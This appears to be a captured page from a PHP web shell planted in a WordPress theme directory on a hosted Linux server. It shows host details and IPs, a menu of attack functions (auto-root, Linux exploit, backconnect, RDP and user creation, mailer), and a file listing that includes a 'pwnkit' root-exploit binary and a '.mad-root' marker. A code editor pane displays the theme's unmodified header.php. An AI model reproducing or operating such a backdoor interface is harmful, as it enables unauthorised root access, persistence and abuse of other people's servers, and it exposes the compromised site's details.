Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.217.120
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
andre-lite /
[ HOME SHELL ]
Name
Size
Permission
Action
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
432
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
animate.css
37.64
KB
-rw-r--r--
archive.php
755
B
-rw-r--r--
comments.php
1.92
KB
-rw-r--r--
content.php
519
B
-rw-r--r--
footer.php
903
B
-rw-r--r--
functions.php
4.6
KB
-rw-r--r--
header.php
2.01
KB
-rw-r--r--
index.php
588
B
-rw-r--r--
page.php
922
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.07
KB
-rw-r--r--
screenshot.png
382.22
KB
-rw-r--r--
search.php
792
B
-rw-r--r--
sidebar.php
212
B
-rw-r--r--
single.php
1.36
KB
-rw-r--r--
style-editor.css
3.82
KB
-rw-r--r--
style-rtl.css
40.86
KB
-rw-r--r--
style.css
40.75
KB
-rw-r--r--
template-home-page.php
435
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header for our theme. * * @package andre */ ?> <!DOCTYPE html> <html class="no-js" <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale = 1.0, maximum-scale=2.0, user-scalable=yes" /> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php if ( is_singular() && pings_open( get_queried_object() ) ) : ?> <link rel="pingback" href="<?php echo esc_url( get_bloginfo( 'pingback_url' ) ); ?>"> <?php endif; ?> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } else { do_action( 'wp_body_open' ); } ?> <div class="overlay"> <button class="menu-button"> <span class="bar3"></span> </button> <div class="overlayleft"> <?php if ( has_nav_menu( 'main-menu' ) ) { wp_nav_menu( array( 'theme_location' => 'main-menu', 'container_class' => 'mainmenu', 'menu_class' => '', 'fallback_cb' => false, ) ); } ?> </div> <div class="overlayright"> <?php get_sidebar(); ?> </div> </div> <div id="container" class="allcontainer"> <div class="slogan"> <h2 class="site-description"> <?php bloginfo( 'description' ); ?> </h2> </div> <?php if ( has_nav_menu( 'social' ) ) { wp_nav_menu( array( 'theme_location' => 'social', 'container' => 'div', 'container_id' => 'menu-social', 'container_class' => 'menu', 'menu_id' => 'menu-social-items', 'menu_class' => 'menu-items', 'depth' => 1, 'link_before' => '<span class="screen-reader-text">', 'link_after' => '</span>', 'fallback_cb' => '', ) ); } ?> <div id="header"> <div id="logo"> <?php the_custom_logo(); ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"> <h1 class="site-title"> <?php bloginfo( 'name' ); ?> </h1> </a> </div> </div>
Close